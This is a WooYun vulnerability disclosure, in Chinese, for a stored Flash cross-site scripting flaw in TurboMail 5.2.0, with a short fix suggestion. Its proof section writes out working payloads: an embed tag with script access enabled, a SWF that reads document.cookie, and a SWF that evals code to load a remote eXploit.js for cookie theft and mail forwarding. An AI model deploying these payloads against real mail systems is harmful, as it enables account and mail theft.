当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062875

漏洞标题:Turbomail邮件系统正文持久型XSS漏洞

相关厂商:Turbomail

漏洞作者: 路人甲

提交时间:2014-05-30 15:25

修复时间:2014-06-04 15:25

公开时间:2014-06-04 15:25

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-30: 细节已通知厂商并且等待厂商处理中
2014-06-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

邮件系统对邮件内容过滤不严格,导致存储型跨站。

详细说明:

1、TurboMail邮件系统对邮件内容过滤不严格,导致存储型FLASH跨站,打开邮件即可触发漏洞,由于FLASH文件可以执行javascript代码,所以我们可以利用此漏洞进行盗取用户信息、用户邮件、钓鱼、修改用户设置、转发邮件等操作。
涉及版本v5.2.0

漏洞证明:

TurboMail下载地址:http://www.turbomail.org/download.html
测试浏览器:Firefox29.0.1、Chrome33.0.1750.149 m
1、写邮件,使用代理对请求进行拦截,本次使用burp suite,修改htmlbody字段值(即邮件内容),如下图所示:

mail1.png


嵌入的恶意代码解码后的内容为:
<embed allowscriptaccess="always" width="0%" height="0%" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shock-wave-flash" src="http://127.0.0.1/xss.swf"></embed>
xss.swf内的脚本代码为:getURL("javascript:alert(document.cookie)");
2、用户打开邮件,漏洞触发:

mail2.png


3、使用Firebug查看页面源代码:

mail3.png


flash文件成功插入,且允许执行脚本代码
4、修改xss.swf文件内容,
import flash.external.ExternalInterface;
ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);");//使用ExternalInterface.call()函数加载本地脚本文件,通过修改本地脚本文件内容我们可以进行盗取用户信息、用户邮件、钓鱼,编写蠕虫等操作。
通过修改eXploit.js文件内容,我们可以进行盗取cookie,转发邮件、删除用户邮件等操作。

修复方案:

修改allowscriptaccess的值,禁止其执行脚本代码

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-04 15:25

厂商回复:

最新状态:

暂无